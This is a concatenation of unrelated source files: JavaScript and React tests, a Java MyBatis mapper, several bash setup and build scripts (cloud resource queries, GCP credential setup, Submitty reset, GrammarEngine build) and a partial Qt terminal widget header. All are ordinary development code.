await expect((async () => {
for await (const obj of reader) {
playlists.push(obj);
}
})()).to.reject('data: uri cannot be updated');
expect(playlists).to.have.length(1);
});
it('does not internally buffer (highWaterMark=0)', async () => {
const { reader, state } = prepareLiveReader();
for await (const obj of reader) {
expect(obj).to.exist();
await Hoek.wait(20);
expect(reader.readableBuffer).to.have.length(0);
state.firstMsn++;
if (state.firstMsn >= 5) {
state.firstMsn = 5;
state.ended = true;
}
}
});
it('can handle playlist starting with 0 segments', async () => {
const { reader, state } = prepareLiveReader({}, { segmentCount: 0, index() {
const index = Shared.genIndex(state);
index.type = 'EVENT';
if (state.segmentCount === 5) {
state.ended = true;
}
else {
state.segmentCount++;
}
return index;
} });
const playlists = [];
for await (const obj of reader) {
expect(obj.playlist.index.lastMsn() + obj.playlist.index.ended).to.equal(playlists.length - 1);
playlists.push(obj);
}
expect(playlists).to.have.length(7);
});
it('emits "close" event when destroyed without consuming', async () => {
const { reader } = prepareLiveReader();
const closeEvent = Events.once(reader, 'close');
while (!reader.playlist) {
await Hoek.wait(1);
}
reader.destroy();
await closeEvent;
});
it('handles a temporary server outage', async () => {
const { reader, state } = prepareLiveReader({}, {
index() {
if (state.error === undefined && state.firstMsn === 5) {
state.error = 6;
}
if (state.error) {
--state.error;
++state.firstMsn;
throw new Error('fail');
}
if (state.firstMsn === 20) {
state.ended = true;
}
const index = Shared.genIndex(state);
++state.firstMsn;
return index;
}
});
const errors = [];
reader.on('problem', errors.push.bind(errors));
const playlists = [];
for await (const obj of reader) {
playlists.push(obj);
}
expect(playlists).to.have.length(15);
expect(errors.length).to.be.greaterThan(0);
expect(errors[0]).to.be.an.error('Internal Server Error');
});
it('handles temporarily going back in time', async () => {
const { reader, state } = prepareLiveReader({}, {
index() {
if (state.firstMsn >= 5) {
state.firstMsn = 5;
state.ended = true;
}
if (state.firstMsn === 2 && !state.jumped) {
state.jumped = true;
state.firstMsn = 0;
}
const index = Shared.genIndex(state);
++state.firstMsn;
return index;
}
});
const playlists = [];
const problems = [];
reader.on('problem', (err) => problems.push(err));
for await (const obj of reader) {
playlists.push(obj);
}
expect(playlists).to.have.length(6);
expect(problems).to.have.length(1);
expect(problems[0]).to.be.an.error('Rejected update from the past');
});
it('eventually goes back in time', async () => {
const { reader, state } = prepareLiveReader({}, {
index() {
if (state.firstMsn >= 5) {
state.firstMsn = 5;
state.ended = true;
}
if (state.firstMsn === 4 && !state.jumped) {
state.jumped = true;
state.firstMsn = 0;
}
const index = Shared.genIndex(state);
++state.firstMsn;
return index;
}
});
const playlists = [];
const problems = [];
reader.on('problem', (err) => problems.push(err));
for await (const obj of reader) {
playlists.push(obj);
}
expect(playlists).to.have.length(8);
expect(problems).to.have.length(2);
expect(problems[1]).to.be.an.error('Rejected update from the past');
});
it('respects the maxStallTime option', async () => {
const { reader } = prepareLiveReader({ maxStallTime: 50 }, { segmentCount: 1 });
await expect((async () => {
for await (const obj of reader) {
expect(obj).to.exist();
}
})()).to.reject(Error, /Index update stalled/);
});
it('errors thrown during "problem" event handler are escalated', async () => {
const { reader, state } = prepareLiveReader({}, {
index() {
if (state.firstMsn === 5) {
throw Boom.internal();
}
const index = Shared.genIndex(state);
++state.firstMsn;
return index;
}
});
const problems = [];
reader.on('problem', (err) => {
problems.push(err);
throw err;
});
const playlists = [];
const err = await expect((async () => {
for await (const obj of reader) {
playlists.push(obj);
}
})()).to.reject('Internal Server Error');
expect(playlists).to.have.length(5);
expect(problems).to.have.length(1);
expect(problems[0]).to.shallow.equal(err);
});
describe('destroy()', () => {
it('works when called while waiting for an update', async () => {
const { reader, state } = prepareLiveReader({ fullStream: false }, {
async index() {
if (state.firstMsn > 0) {
await Hoek.wait(100);
}
return Shared.genIndex(state);
}
});
setTimeout(() => reader.destroy(), 50);
const playlists = [];
for await (const obj of reader) {
playlists.push(obj);
state.firstMsn++;
}
expect(playlists).to.have.length(1);
});
it('emits passed error', async () => {
const { reader, state } = prepareLiveReader({ fullStream: false }, {
async index() {
if (state.firstMsn > 0) {
await Hoek.wait(10);
}
return Shared.genIndex(state);
}
});
setTimeout(() => reader.destroy(new Error('destroyed')), 50);
await expect((async () => {
for await (const {} of reader) {
state.firstMsn++;
}
})()).to.reject('destroyed');
});
});
// TODO: move
describe('isRecoverableUpdateError()', () => {
it('is called on index update errors', async () => {
const { reader, state } = prepareLiveReader({}, {
index() {
const { error } = state;
if (error) {
state.error++;
switch (error) {
case 1:
case 2:
case 3:
throw Boom.notFound();
case 4:
throw Boom.serverUnavailable();
case 5:
throw Boom.unauthorized();
}
}
else if (state.firstMsn === 5) {
state.error = 1;
return '';
}
const index = Shared.genIndex(state);
++state.firstMsn;
return index;
}
});
const errors = [];
reader.isRecoverableUpdateError = function (err) {
errors.push(err);
return HlsPlaylistReader.prototype.isRecoverableUpdateError.call(reader, err);
};
const playlists = [];
const err = await expect((async () => {
for await (const obj of reader) {
playlists.push(obj);
}
})()).to.reject('Unauthorized');
expect(playlists).to.have.length(5);
expect(errors).to.have.length(4);
expect(errors[0]).to.have.error(M3U8Parse.ParserError, 'Missing required #EXTM3U header');
expect(errors[1]).to.have.error(Boom.Boom, 'Not Found');
expect(errors[2]).to.have.error(Boom.Boom, 'Service Unavailable');
expect(errors[3]).to.shallow.equal(err);
});
});
describe('with LL-HLS', () => {
const prepareLlReader = function (readerOptions = {}, state = {}, indexGen) {
return prepareLiveReader({
lowLatency: true,
...readerOptions
}, {
partIndex: 0,
partCount: 5,
index: indexGen,
...state
});
};
const { genLlIndex } = Shared;
it('handles a basic stream', async () => {
const { reader, state } = prepareLlReader({}, { partIndex: 4, end: { msn: 20, part: 3 } }, (query) => genLlIndex(query, state));
const playlists = [];
const expected = { msn: 10, parts: state.partIndex };
for await (const obj of reader) {
const index = obj.playlist.index;
expect(index.lastMsn(true)).to.equal(expected.msn);
expect(index.getSegment(index.lastMsn(true)).parts.length).to.equal(expected.parts);
++expected.parts;
if (expected.parts > state.partCount) {
++expected.msn;
expected.parts = 1;
}
if (!index.ended) {
expect(reader.hints.part).to.exist();
}
playlists.push(obj);
}
expect(playlists).to.have.length(50);
expect(reader.hints.part).to.not.exist();
});
it('ignores LL parts when lowLatency=false', async () => {
const { reader, state } = prepareLlReader({ lowLatency: false }, { partIndex: 4, end: { msn: 20, part: 3 } }, (query) => genLlIndex(query, state));
const playlists = [];
for await (const obj of reader) {
expect(reader.hints.part).to.not.exist();
playlists.push(obj);
}
expect(playlists.length).to.equal(13);
});
it('handles weird hint changes (or no change)', async () => {
const hints = new Set();
const { reader, state } = prepareLlReader({}, { partIndex: 4, end: { msn: 15, part: 3 } }, (query) => {
const index = genLlIndex(query, state);
let hint;
if (state.partIndex === 1 || state.partIndex === 2) {
hint = new AttrList({ type: 'PART', uri: '"a"' });
}
else if (state.partIndex === 3) {
hint = new AttrList({ type: 'PART', uri: '"a"', 'byterange-start': '0' });
}
else if (state.partIndex === 4) {
hint = new AttrList({ type: 'PART', uri: '"a"', 'byterange-start': '0', 'byterange-length': '10' });
}
index.meta.preload_hints = hint ? [hint] : undefined;
return index;
});
const playlists = [];
for await (const obj of reader) {
playlists.push(obj);
hints.add(reader.hints);
}
expect(playlists).to.have.length(25);
expect(hints.size).to.equal(19);
});
});
// TODO: resilience??
});
});
|
<reponame>elvcastelo/mathjax-react<gh_stars>0
// Re-export the Context and Node building blocks, both as named
// exports and bundled together as the default export.
import Context from './Context'
import Node from './Node'
export { Context, Node }
export default { Context, Node }
<filename>nova-gestion-backend/src/main/java/ca/nova/gestion/mappers/EmployeeMapper.java
package ca.nova.gestion.mappers;
import ca.nova.gestion.model.Employee;
import org.apache.ibatis.annotations.Mapper;
import org.springframework.stereotype.Repository;
/**
 * MyBatis mapper exposing CRUD access to {@link Employee} rows.
 * SQL statements are bound externally (XML mapping or annotations
 * elsewhere) — this interface only declares the contract.
 */
@Mapper
@Repository
public interface EmployeeMapper {
    /** Fetches one employee by id (presumably null when absent — confirm against the SQL mapping). */
    Employee getEmployee(int idEmployee);
    /** Updates an existing employee row from the given object. */
    void updateEmployee(Employee employee);
    /** Inserts a new employee row. */
    void insertEmployee(Employee employee);
}
|
#!/bin/bash
# Query existing CSP resources (keypair, security group, VPC/subnet)
# through spctl for the chosen cloud provider, timing each lookup.
if [ "$1" = "" ]; then
	echo
	echo -e 'usage: '$0' mock|aws|azure|gcp|alibaba|tencent|ibm|openstack|cloudit|ncp|nhncloud'
	echo -e '\n\tex) '$0' aws'
	echo
	exit 0;
fi
# Loads CONN_CONFIG, KEYPAIR_NAME, SG_NAME, VPC_NAME and CLIPATH for "$1".
source ./setup.env $1
echo "============== before get KeyPair: '${KEYPAIR_NAME}'"
time $CLIPATH/spctl --config $CLIPATH/spctl.conf keypair get --cname "${CONN_CONFIG}" -n "${KEYPAIR_NAME}" 2> /dev/null
echo "============== after get KeyPair: '${KEYPAIR_NAME}'"
echo -e "\n\n"
echo "============== before get SecurityGroup: '${SG_NAME}'"
time $CLIPATH/spctl --config $CLIPATH/spctl.conf security get --cname "${CONN_CONFIG}" -n "${SG_NAME}" 2> /dev/null
echo "============== after get SecurityGroup: '${SG_NAME}'"
echo -e "\n\n"
echo "============== before get VPC/Subnet: '${VPC_NAME}'"
time $CLIPATH/spctl --config $CLIPATH/spctl.conf vpc get --cname "${CONN_CONFIG}" -n "${VPC_NAME}" 2> /dev/null
echo "============== after get VPC/Subnet: '${VPC_NAME}'"
echo -e "\n\n"
|
#!/bin/bash
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Add GCP credentials path to configuration defaults file.
# Check arguments for existing json key file.
# arguments: <project-id>-<unique-id>.json
function checkArgs () {
    local FILE_ARG='<path to json service account key file>'
    if [ -z "$1" ]; then
        echo 'Error: missing argument.'
        echo "$0 ${FILE_ARG}"
        exit 1
    fi
    # "exists" is a sentinel meaning "reuse already-installed credentials";
    # any other value must name a readable key file.
    if [ "$1" != "exists" ] && [ ! -e "$1" ]; then
        echo 'Error: file not found.'
        echo "$0 ${FILE_ARG}"
        exit 1
    fi
}
# Backup existing and create new - if credentials.bak exists fail.
# arguments: source_credentials_file target_file_path
function backupAndCopyCredentials() {
    # Timestamped backup name keeps previous backups from being clobbered.
    local BACKUP_FILE="$2.bak.$(date +%s)"
    # FIX: quote "$2" — the unquoted test broke for paths with spaces.
    if [ -e "$2" ]; then
        cp "$2" "${BACKUP_FILE}"
        echo "Created backup (${BACKUP_FILE})."
    fi
    cp "$1" "$2"
    echo "Created $2 from $1."
}
# Start a new terraform.tfvars file.
# arguments: full_path_file_name.
function createTFVars() {
    # FIX: quote "$1" everywhere so tfvars paths with spaces work; the
    # behavior is otherwise unchanged (no-op when the file already exists).
    if [ ! -e "$1" ]; then
        echo "/*" > "$1"
        echo " * Initialized Terraform variables." >> "$1"
        echo " */" >> "$1"
    fi
}
# If not already present, add a key-value to tfvars file.
# arguments: tfvars_path_file_name key value
function addTFVar() {
    if [ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ]; then
        echo 'Error: missing argument for addTFVar().'
        exit 1
    fi
    # FIX: grep the file directly instead of `cat $1 | grep $2` (useless
    # cat, unquoted expansions); -q avoids capturing output and '--'
    # guards against keys that start with a dash.  Also dropped the
    # unused local VAR_NAME.
    if ! grep -q -- "$2" "$1"; then
        echo "" >> "$1"
        echo "$2 = \"$3\"" >> "$1"
        echo "Updated $2 in $1."
    fi
}
# Create fresh GCP credentials file and point Terraform at it.
# arguments: <project-id>-<unique-id>.json
function createCredentials () {
    # ~ only expands when NOT quoted (below).
    local CREDS_FILE_DIR=~/.config/gcloud
    local CREDS_FILE_PATH="${CREDS_FILE_DIR}/credentials_autonetdeploy.json"
    # Directory containing this script, resolved even for relative invocation.
    local THIS_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
    local LB1_DIR_PATH="${THIS_DIR}/example-lb"
    local LB1_FILE_PATH="${LB1_DIR_PATH}/terraform.tfvars"
    local LB2_DIR_PATH="${THIS_DIR}/example-lb-internal"
    local LB2_FILE_PATH="${LB2_DIR_PATH}/terraform.tfvars"
    local LB3_DIR_PATH="${THIS_DIR}/example-lb-http"
    local LB3_FILE_PATH="${LB3_DIR_PATH}/terraform.tfvars"
    local TFVAR_CREDS='gcp_credentials_file_path'
    # "exists" means the key file is already installed; skip the copy.
    if [ "$1" != "exists" ]; then
        mkdir -p ${CREDS_FILE_DIR}
        backupAndCopyCredentials $1 ${CREDS_FILE_PATH}
    fi
    # Ensure each example's terraform.tfvars exists and points at the creds.
    createTFVars "${LB1_FILE_PATH}"
    addTFVar "${LB1_FILE_PATH}" "${TFVAR_CREDS}" "${CREDS_FILE_PATH}"
    createTFVars "${LB2_FILE_PATH}"
    addTFVar "${LB2_FILE_PATH}" "${TFVAR_CREDS}" "${CREDS_FILE_PATH}"
    createTFVars "${LB3_FILE_PATH}"
    addTFVar "${LB3_FILE_PATH}" "${TFVAR_CREDS}" "${CREDS_FILE_PATH}"
}
# Copy/create file under ~/.config/gcloud
checkArgs $1
# Pass "exists" to skip credential file copying.
createCredentials $1
|
<filename>use-cases/Synthetic/t204/m1.js
// Synthetic analysis fixture: exercises property reads/writes and a
// bare call on `isPrototypeOf`.  Not meant to run directly —
// isPrototypeOf is unbound here, and the built-in length/name
// properties being assigned are read-only.
var _;
_ = isPrototypeOf.length;
_ = isPrototypeOf.name;
isPrototypeOf.length = {};
isPrototypeOf.name = {};
isPrototypeOf();
|
import React from 'react';
import { mount } from 'enzyme';
import moment from 'moment';
import { DayPickerSingleDateController } from 'react-dates';
import { act, cleanup, render } from '@testing-library/react';
import InputText from '../../InputText';
import DatePicker from '../index';
jest.useFakeTimers();
// Minimal props shared by every DatePicker test case.
const defaultProps = {
  type: 'date',
  name: 'date',
  onChange: jest.fn(),
};
// Mount the component with enzyme so tests can traverse child components.
const renderComponent = (props = defaultProps) =>
  mount(<DatePicker {...props} />);
describe('<DatePicker />', () => {
afterEach(cleanup);
// eslint-disable-next-line jest/expect-expect
it('should not crash', () => {
renderComponent();
});
it('should match snapshot', () => {
const { asFragment } = render(<DatePicker {...defaultProps} />);
expect(asFragment()).toMatchSnapshot();
});
it('should render an input text', () => {
const wrapper = renderComponent();
const input = wrapper.find(InputText);
expect(input).toHaveLength(1);
});
it('should render a date picker on input text click', () => {
const onChange = jest.fn();
const props = {
...defaultProps,
onChange,
value: moment(new Date(), 'YYYY-MM-DD'),
};
const wrapper = renderComponent(props);
const input = wrapper.find('input');
input.simulate('click');
const datePicker = wrapper.find(DayPickerSingleDateController);
expect(datePicker).toHaveLength(1);
});
it('should render onChange props on datepicker select', () => {
const onChange = jest.fn();
const props = {
...defaultProps,
onChange,
value: moment(new Date(), 'YYYY-MM-DD'),
};
const wrapper = renderComponent(props);
const input = wrapper.find('input');
input.simulate('click');
const datePicker = wrapper.find(DayPickerSingleDateController);
act(() => {
datePicker.props().onDateChange(moment('1993-07-05', 'YYYY-MM-DD'));
});
expect(onChange).toHaveBeenCalledWith({
target: {
name: 'date',
type: 'date',
value: moment('1993-07-05', 'YYYY-MM-DD'),
},
});
});
it('should display the date value in a human readable format', () => {
const onChange = jest.fn();
const props = {
...defaultProps,
onChange,
value: moment('1993-07-05', 'YYYY-MM-DD'),
};
const wrapper = renderComponent(props);
const input = wrapper.find('input');
expect(input.props().value).toBe('July 05, 1993');
});
it('should use the defaultProps', () => {
const {
defaultProps: { onChange },
} = DatePicker;
expect(onChange).toBeDefined();
});
});
|
#!/bin/bash
# Automated regeneration of sample course data
########################################################################
# Optional flag: --no_submissions skips regenerating student submissions.
EXTRA=
while :; do
    case $1 in
        --no_submissions)
            EXTRA="--no_submissions"
            ;;
        *) # No more options, so break out of the loop.
            break
    esac
    shift
done
# If any command fails, we need to bail
set -ev
# this script must be run by root or sudo
if [[ "$UID" -ne "0" ]] ; then
    echo "ERROR: This script must be run by root or sudo"
    exit 1
fi
# Get into the script's directory.
# FIX: replaced the fragile `echo $0 | sed` parsing (which needed a
# special case when $0 contained no slash) with standard dirname, which
# yields "." in that case and handles paths with spaces.
cd "$(dirname "$0")"
# GIT_CHECKOUT/Submitty/.setup/bin -> GIT_CHECKOUT/Submitty
cd ../../
# python3 ./.setup/bin/partial_reset.py
python3 ./.setup/bin/setup_sample_courses.py ${EXTRA}
# Restart PHP-FPM for whichever PHP major.minor version is installed.
PHP_VERSION=$(php -r 'print PHP_MAJOR_VERSION.".".PHP_MINOR_VERSION;')
service php${PHP_VERSION}-fpm restart
# Bring the Submitty daemons back up.
DAEMONS=( submitty_websocket_server submitty_autograding_shipper submitty_autograding_worker submitty_daemon_jobs_handler )
for i in "${DAEMONS[@]}"; do
    systemctl start ${i}
done
|
#!/bin/bash
# Build helper for GrammarEngine: pulls the latest sources, builds with
# cmake/make and copies the artifacts into /out, chowned to the caller.
#
# Options:
#   -j=N | --threads=N   run make with N parallel jobs
#   -g=G | --guid=G      group id used to chown /out
#   -u=U | --uid=U       user id used to chown /out
make_cmd="make"
guid="1"
uid="1"
for i in "$@"
do
case $i in
    -j=*|--threads=*)
    make_cmd="make -j ${i#*=}"
    ;;
    -g=*|--guid=*)
    guid="${i#*=}"
    ;;
    -u=*|--uid=*)
    uid="${i#*=}"
    ;;
    *)
    # unknown option skip
    ;;
esac
done
# Every step below is chained with && so the first failure aborts the build.
cd /GrammarEngine/src/build && \
echo "=== Try to pull new version... ===" && \
git pull && \
echo "=== Generate makefiles with cmake ===" && \
cmake .. && \
echo "=== Build ===" && \
$make_cmd && \
echo "=== Copy include and libs files ===" && \
mkdir -p /out/include && \
mkdir -p /out/bin && \
mkdir -p /out/dict && \
mkdir -p /out/lib && \
cp ../lib64/*.so /out/lib && \
cp -r ../include/ /out/ && \
find ../exe64 -executable -type f -execdir sh -c 'cp {} "/out/bin/$(basename {})"' \; && \
cp ../bin-linux64/* /out/dict/ && \
echo "=== Chown with passed uid and guid ===" && \
chown -R "$uid":"$guid" /out/* && \
echo "=== Done ==="
|
<filename>qlightterminal.h
/*
* Copyright© <NAME> <<EMAIL>>
*/
#ifndef QLIGHTTERMINAL_H
#define QLIGHTTERMINAL_H
#include <QWidget>
#include <QStringList>
#include <QScrollBar>
#include <QHBoxLayout>
#include <QKeyCombination>
#include <QTimer>
#include <QPointF>
#include <QTime>
#include <QColor>
#include "st.h"
// Maps a Qt key (plus modifier) to the escape sequence sent to the shell.
typedef struct {
    Qt::Key key;                // key code to match
    Qt::KeyboardModifier mods;  // required keyboard modifier
    char cmd[7];                // escape sequence to emit
    size_t cmd_size;            // byte count of cmd — NOTE(review): some entries appear to include the trailing NUL, others not; confirm against the sender
    int nextKey;                // presumably a skip count for the lookup over the keys[] table — TODO confirm
} SpecialKey;
// Cached geometry/typography state for the terminal widget.
typedef struct {
    int width;               // widget width in px
    int height;              // widget height in px
    int viewPortHeight; // number of lines visible
    int viewPortWidth; // number of characters per line
    int scrollMultiplier; // allows for smooth scrolling
    int fontSize;            // current font size in pt
    double lineheight;       // line height in px
    double lineHeightScale;  // multiplier applied to the font's line height
    double charHeight;       // character cell height in px
    double charWith;         // character cell width in px (sic "With": renaming would break other users of this struct)
    int vPadding;            // vertical padding in px
    int hPadding;            // horizontal padding in px
} Window;
class QLightTerminal : public QWidget {
Q_OBJECT
public:
QLightTerminal(QWidget *parent = nullptr);
public
slots:
void updateTerminal(Term * term);
/*
* Scrolls the terminal vertically to the given offset
* Max scroll height is the max line count multiplied by win.scrollMultiplier
*/
void scrollX(int x);
void setFontSize(int size, int weight = 500);
void setBackground(QColor color);
void setLineHeightScale(double lineHeight);
void setPadding(double vertical, double horizontal);
void close();
signals:
void s_closed(); // emitted when the terminal is closed
void s_error(QString);
protected:
void keyPressEvent(QKeyEvent *event) override;
void resizeEvent(QResizeEvent *event) override;
void wheelEvent(QWheelEvent *event) override;
void focusOutEvent(QFocusEvent *event) override;
void mousePressEvent(QMouseEvent *event) override;
void mouseDoubleClickEvent(QMouseEvent *event) override;
void mouseReleaseEvent(QMouseEvent *event) override;
void mouseMoveEvent(QMouseEvent *event) override;
bool focusNextPrevChild(bool next) override;
void paintEvent(QPaintEvent *event) override;
private:
SimpleTerminal *st;
QScrollBar scrollbar;
QHBoxLayout boxLayout;
QTimer cursorTimer;
QTimer selectionTimer;
QTimer resizeTimer;
Window win;
double cursorVisible = true;
void setupScrollbar();
void updateStyleSheet();
void updateSelection();
void resize();
bool closed = false;
qint64 lastClick = 0;
bool mouseDown = false;
bool selectionStarted = false;
QPointF lastMousePos; // last tracked mouse pos if mouse down
/*
* Special Keyboard Character
* TODO: Add more
*/
const int defaultBackground = 259;
constexpr static const SpecialKey
keys[25] = {
{ Qt::Key_Left, Qt::KeyboardModifier::NoModifier, "\033[D", 3, 4 },
{ Qt::Key_Left, Qt::ShiftModifier, "\033[1;2D", 7, 3 },
{ Qt::Key_Left, Qt::AltModifier, "\033[1;3D", 7, 2 },
{ Qt::Key_Left, Qt::ControlModifier, "\033[1;5D", 7, 1 },
{ Qt::Key_Up, Qt::NoModifier, "\033[A", 3, 4 },
{ Qt::Key_Up, Qt::ShiftModifier, "\033[1;2A", 7, 3 },
{ Qt::Key_Up, Qt::AltModifier, "\033[1;3A", 7, 2 },
{ Qt::Key_Up, Qt::ControlModifier, "\033[1;5A", 7, 1 },
{ Qt::Key_Right, Qt::NoModifier, "\033[C", 3, 4 },
{ Qt::Key_Right, Qt::ShiftModifier, "\033[1;2C", 7, 3 },
{ Qt::Key_Right, Qt::AltModifier, "\033[1;3C", 7, 2 },
{ Qt::Key_Right, Qt::ControlModifier, "\033[1;5C", 7, 1 },
{ Qt::Key_Down, Qt::NoModifier, "\033[B", 3, 4 },
{ Qt::Key_Down, Qt::ShiftModifier, "\033[1;2B", 7, 3 },
{ Qt::Key_Down, Qt::AltModifier, "\033[1;3B", 7, 2 },
{ Qt::Key_Down, Qt::ControlModifier, "\033[1;5B", 7, 1 },
{ Qt::Key_F1, Qt::NoModifier, "\033OP", 3, 1 },
{ Qt::Key_F2, Qt::NoModifier, "\033OQ", 3, 1 },
{ Qt::Key_F3, Qt::NoModifier, "\033OR", 3, 1 },
{ Qt::Key_F4, Qt::NoModifier, "\033OS", 3, 1 },
{ Qt::Key_F5, Qt::NoModifier, "\033[15~", 6, 1 },
{ Qt::Key_F6, Qt::NoModifier, "\033[17~", 6, 1 },
{ Qt::Key_F7, Qt::NoModifier, "\033[18~", 6, 1 },
{ Qt::Key_F8, Qt::NoModifier, "\033[19~", 6, 1 },
{ Qt::Key_F9, Qt::NoModifier, "\033[20~", 6, 1 },
};
/*
* Terminal colors (same as xterm)
*/
QColor colors[260] = {
// 8 normal Colors
QColor(0, 0, 0), // Black
QColor(240, 82, 79), // Red
QColor(98, 177, 32), // Green
QColor(166, 138, 13), // Yellow
QColor(57, 147, 212), // Blue
QColor(167, 113, 191), // Magenta
QColor(0, 163, 163), // Cyan
QColor(128, 128, 128), // Gray
// 8 bright colors
QColor(89, 89, 89), // Dark Gray
QColor(255, 64, 80), // Bright Red
QColor(79, 196, 20), // Bright Green
QColor(229, 191, 0), // Bright Yellow
QColor(31, 176, 225), // Bright Blue
QColor(237, 126, 237), // Bright Magenta
QColor(0, 229, 229), // Bright Cyan
QColor(255, 255, 255), // White
QColor(0, 0, 0),
QColor(0, 0, 95),
QColor(0, 0, 135),
QColor(0, 0, 175),
QColor(0, 0, 215),
QColor(0, 0, 255),
QColor(0, 95, 0),
QColor(0, 95, 95),
QColor(0, 95, 135),
QColor(0, 95, 175),
QColor(0, 95, 215),
QColor(0, 95, 255),
QColor(0, 135, 0),
QColor(0, 135, 95),
QColor(0, 135, 135),
QColor(0, 135, 175),
QColor(0, 135, 215),
QColor(0, 135, 255),
QColor(0, 175, 0),
QColor(0, 175, 95),
QColor(0, 175, 135),
QColor(0, 175, 175),
QColor(0, 175, 215),
QColor(0, 175, 255),
QColor(0, 215, 0),
QColor(0, 215, 95),
QColor(0, 215, 135),
QColor(0, 215, 175),
QColor(0, 215, 215),
QColor(0, 215, 255),
QColor(0, 255, 0),
QColor(0, 255, 95),
QColor(0, 255, 135),
QColor(0, 255, 175),
QColor(0, 255, 215),
QColor(0, 255, 255),
QColor(95, 0, 0),
QColor(95, 0, 95),
QColor(95, 0, 135),
QColor(95, 0, 175),
QColor(95, 0, 215),
QColor(95, 0, 255),
QColor(95, 95, 0),
QColor(95, 95, 95),
QColor(95, 95, 135),
QColor(95, 95, 175),
QColor(95, 95, 215),
QColor(95, 95, 255),
QColor(95, 135, 0),
QColor(95, 135, 95),
QColor(95, 135, 135),
QColor(95, 135, 175),
QColor(95, 135, 215),
QColor(95, 135, 255),
QColor(95, 175, 0),
QColor(95, 175, 95),
QColor(95, 175, 135),
QColor(95, 175, 175),
QColor(95, 175, 215),
QColor(95, 175, 255),
QColor(95, 215, 0),
QColor(95, 215, 95),
QColor(95, 215, 135),
QColor(95, 215, 175),
QColor(95, 215, 215),
QColor(95, 215, 255),
QColor(95, 255, 0),
QColor(95, 255, 95),
QColor(95, 255, 135),
QColor(95, 255, 175),
QColor(95, 255, 215),
QColor(95, 255, 255),
QColor(135, 0, 0),
QColor(135, 0, 95),
QColor(135, 0, 135),
QColor(135, 0, 175),
QColor(135, 0, 215),
QColor(135, 0, 255),
QColor(135, 95, 0),
QColor(135, 95, 95),
QColor(135, 95, 135),
QColor(135, 95, 175),
QColor(135, 95, 215),
QColor(135, 95, 255),
QColor(135, 135, 0),
QColor(135, 135, 95),
QColor(135, 135, 135),
QColor(135, 135, 175),
QColor(135, 135, 215),
QColor(135, 135, 255),
QColor(135, 175, 0),
QColor(135, 175, 95),
QColor(135, 175, 135),
QColor(135, 175, 175),
QColor(135, 175, 215),
QColor(135, 175, 255),
QColor(135, 215, 0),
QColor(135, 215, 95),
QColor(135, 215, 135),
QColor(135, 215, 175),
QColor(135, 215, 215),
QColor(135, 215, 255),
QColor(135, 255, 0),
QColor(135, 255, 95),
QColor(135, 255, 135),
QColor(135, 255, 175),
QColor(135, 255, 215),
QColor(135, 255, 255),
QColor(175, 0, 0),
QColor(175, 0, 95),
QColor(175, 0, 135),
QColor(175, 0, 175),
QColor(175, 0, 215),
QColor(175, 0, 255),
QColor(175, 95, 0),
QColor(175, 95, 95),
QColor(175, 95, 135),
QColor(175, 95, 175),
QColor(175, 95, 215),
QColor(175, 95, 255),
QColor(175, 135, 0),
QColor(175, 135, 95),
QColor(175, 135, 135),
QColor(175, 135, 175),
QColor(175, 135, 215),
QColor(175, 135, 255),
QColor(175, 175, 0),
QColor(175, 175, 95),
QColor(175, 175, 135),
QColor(175, 175, 175),
QColor(175, 175, 215),
QColor(175, 175, 255),
QColor(175, 215, 0),
QColor(175, 215, 95),
QColor(175, 215, 135),
QColor(175, 215, 175),
QColor(175, 215, 215),
QColor(175, 215, 255),
QColor(175, 255, 0),
QColor(175, 255, 95),
QColor(175, 255, 135),
QColor(175, 255, 175),
QColor(175, 255, 215),
QColor(175, 255, 255),
QColor(215, 0, 0),
QColor(215, 0, 95),
QColor(215, 0, 135),
QColor(215, 0, 175),
QColor(215, 0, 215),
QColor(215, 0, 255),
QColor(215, 95, 0),
QColor(215, 95, 95),
QColor(215, 95, 135),
QColor(215, 95, 175),
QColor(215, 95, 215),
QColor(215, 95, 255),
QColor(215, 135, 0),
QColor(215, 135, 95),
QColor(215, 135, 135),
QColor(215, 135, 175),
QColor(215, 135, 215),
QColor(215, 135, 255),
QColor(215, 175, 0),
QColor(215, 175, 95),
QColor(215, 175, 135),
QColor(215, 175, 175),
QColor(215, 175, 215),
QColor(215, 175, 255),
QColor(215, 215, 0),
QColor(215, 215, 95),
QColor(215, 215, 135),
QColor(215, 215, 175),
QColor(215, 215, 215),
QColor(215, 215, 255),
QColor(215, 255, 0),
QColor(215, 255, 95),
QColor(215, 255, 135),
QColor(215, 255, 175),
QColor(215, 255, 215),
QColor(215, 255, 255),
QColor(255, 0, 0),
QColor(255, 0, 95),
QColor(255, 0, 135),
QColor(255, 0, 175),
QColor(255, 0, 215),
QColor(255, 0, 255),
QColor(255, 95, 0),
QColor(255, 95, 95),
QColor(255, 95, 135),
QColor(255, 95, 175),
QColor(255, 95, 215),
QColor(255, 95, 255),
QColor(255, 135, 0),
QColor(255, 135, 95),
QColor(255, 135, 135),
QColor(255, 135, 175),
QColor(255, 135, 215),
QColor(255, 135, 255),
QColor(255, 175, 0),
QColor(255, 175, 95),
QColor(255, 175, 135),
QColor(255, 175, 175),
QColor(255, 175, 215),
QColor(255, 175, 255),
QColor(255, 215, 0),
QColor(255, 215, 95),
QColor(255, 215, 135),
QColor(255, 215, 175),
QColor(255, 215, 215),
QColor(255, 215, 255),
QColor(255, 255, 0),
QColor(255, 255, 95),
QColor(255, 255, 135),
QColor(255, 255, 175),
QColor(255, 255, 215),
QColor(255, 255, 255),
QColor(8, 8, 8),
QColor(18, 18, 18),
QColor(28, 28, 28),
QColor(38, 38, 38),
QColor(48, 48, 48),
QColor(58, 58, 58),
QColor(68, 68, 68),
QColor(78, 78, 78),
QColor(88, 88, 88),
QColor(98, 98, 98),
QColor(108, 108, 108),
QColor(118, 118, 118),
QColor(128, 128, 128),
QColor(138, 138, 138),
QColor(148, 148, 148),
QColor(158, 158, 158),
QColor(168, 168, 168),
QColor(178, 178, 178),
QColor(188, 188, 188),
QColor(198, 198, 198),
QColor(208, 208, 208),
QColor(218, 218, 218),
QColor(228, 228, 228),
